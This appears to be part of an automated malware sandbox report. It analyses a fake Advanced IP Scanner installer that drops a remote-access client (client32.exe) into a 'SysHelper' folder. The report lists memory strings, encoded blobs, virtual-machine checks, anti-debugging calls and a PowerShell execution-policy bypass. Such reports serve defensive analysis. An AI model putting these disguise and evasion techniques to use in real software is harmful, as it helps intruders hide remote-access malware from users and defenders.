U4bfsJ86Et2lEx48qiztRcURyxPfGHFAfgzfoadSoaZLu/E0yfJEI4a/Ky3bjEeVodHwo+JJNhpnotKZpXoj5svdlp+r7JM7vZa448o+ryGuU9kXqkWRcBwHfHTam0hCPEZANcoi0nvwPSTbVuXYVhQ0VtzntoujFsDIfG0hro8rNChFnoczbqddKl2lpM9ApVvCuDnyUtg6HNFURz5Fiirsx6afEOY1kekafyI0Hzd74U4VvpOQJIFftkMmrGE2wTMHv0f9F8rxD7E5toR4jiu1HN/4RMvRpuZIi5fbyXP0JrLNF0cAPlUN4baAgVv5PYLldGHDPzFAtYDEHWOUryNY1Be8PSjFqxezOHj6wB7OQYc9wVqq8zDGKjdH9IrbcBqE3kERemgzCiebgiSixLlOgnW8YnFzORg1Kc28gwnknazS3gnziHw5NrO3cL/FJfEQlZt4WmlrhsSozNjM1Xzff4w4xi/6aDfW2DrmSaXNTbad6K+Y+/E8P2RrtpNiQTjH70yQ44MEcczyTvViC7TdqVpBz4nT2ubupNi2QSaLvHp7dWRV
Source: powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: client32.exe, 00000007.00000002.4192062509.0000000002F93000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4190771017.000000000045E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: TCCTL32.DLL.5.dr	Binary or memory string: VMWare
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: TCCTL32.DLL.5.dr	Binary or memory string: >localhost:%d%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesvirtualVMWarevirt0000000000%02X%02X%02X%02X%02X%02XBluetoothpfntcctlex.cppRtlIpv6AddressToStringWntdll.dllntohlTCREMOTETCBRIDGE%s=%s
Source: client32.exe, 0000000A.00000003.2164009514.0000000000590000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: client32.exe, 00000008.00000003.2082979500.00000000006FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	API call chain: ExitProcess graph end node			graph_7-101421
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_1116A559

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_110CFCF0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,

7_2_110CFCF0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

7_2_11029230

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11178A14 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

7_2_11178A14

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11030B10 SetUnhandledExceptionFilter,	7_2_11030B10
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_1116A559
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_1115E4D1
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685B28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_685B28E1
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685B87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_685B87F5
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_687E0807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	7_2_687E0807
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11030B10 SetUnhandledExceptionFilter,	8_2_11030B10
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_1116A559
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_1115E4D1

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

